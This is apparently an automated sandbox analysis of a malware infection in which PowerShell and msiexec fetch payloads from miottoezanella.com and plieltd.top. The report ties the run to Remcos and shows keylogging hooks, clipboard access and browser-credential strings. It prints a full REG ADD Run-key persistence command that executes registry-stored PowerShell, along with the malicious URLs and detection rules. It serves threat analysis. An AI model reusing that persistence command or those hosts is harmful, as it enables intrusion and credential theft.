                Source: msiexec.exe, 00000008.00000002.4528323110.0000000023130000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000008.00000002.4528323110.0000000023130000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: miottoezanella.com
                Source: global trafficDNS traffic detected: DNS query: plieltd.top
                Source: global trafficDNS traffic detected: DNS query: pelele.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006AF0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, bhvC236.tmp.14.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCB1891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://miottoezanella.com
                Source: powershell.exe, 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: bhvC236.tmp.14.drString found in binary or memory: http://ocspx.digicert.com0E
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCAFAF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2345858403.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhvC236.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhvC236.tmp.14.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554661567.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554228868.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554251966.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554209398.0000000002ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 00000012.00000002.2554661567.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554228868.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554251966.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000012.00000003.2554209398.0000000002ABC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                Source: msiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 00000008.00000002.4525829481.00000000228B0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: bhvC236.tmp.14.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                Source: msiexec.exe, 0000000E.00000002.2577200402.0000000002A33000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhvC236.tmp.14.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                Source: bhvC236.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhvC236.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhvC236.tmp.14.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCAFAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004BF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
                Source: bhvC236.tmp.14.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhvC236.tmp.14.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                Source: powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhvC236.tmp.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhvC236.tmp.14.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                Source: bhvC236.tmp.14.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCB101A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhvC236.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhvC236.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhvC236.tmp.14.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCB101A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2196657506.000001DCAFD1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com
                Source: powershell.exe, 00000002.00000002.2241503546.000001DCC7CF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com/
                Source: powershell.exe, 00000002.00000002.2196657506.000001DCAFD1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com/Hovedvrket.rarP
                Source: powershell.exe, 00000005.00000002.2345858403.0000000004D48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://miottoezanella.com/Hovedvrket.rarXR
                Source: powershell.exe, 00000002.00000002.2234266355.000001DCBFB5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2364668825.0000000005C55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhvC236.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                Source: bhvC236.tmp.14.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/l
                Source: msiexec.exe, 00000008.00000002.4512385168.0000000006AD7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.4524470117.0000000022230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/nwnNBPSeuTV8.bin
                Source: msiexec.exe, 00000008.00000002.4524470117.0000000022230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/nwnNBPSeuTV8.binafsksGodmiottoezanella.com/nwnNBPSeuTV8.bin
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhvC236.tmp.14.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2554415124.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
                Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhvC236.tmp.14.dr String found in binary or memory: https://www.office.com/
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown HTTPS traffic detected: 194.76.118.27:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.5:49797 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\msiexec.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0041183A OpenClipboard,GetLastError
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

                E-Banking Fraud

                Source: Yara match File source: 00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1276, type: MEMORYSTR
                Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_6388.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5576, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6388, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exe Process Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00401806 NtdllDefWindowProc_W
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004018C0 NtdllDefWindowProc_W
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004016FD NtdllDefWindowProc_A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004017B7 NtdllDefWindowProc_A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00402CAC NtdllDefWindowProc_A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00402D66 NtdllDefWindowProc_A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F3B2C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F3C022
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04B3F328
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04B3FBF8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04B3EFE0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_228F7194
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_228EB5C1
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)"
                Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6147
                Source: unknown Process created: Commandline size = 6171
                Source: amsi32_6388.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
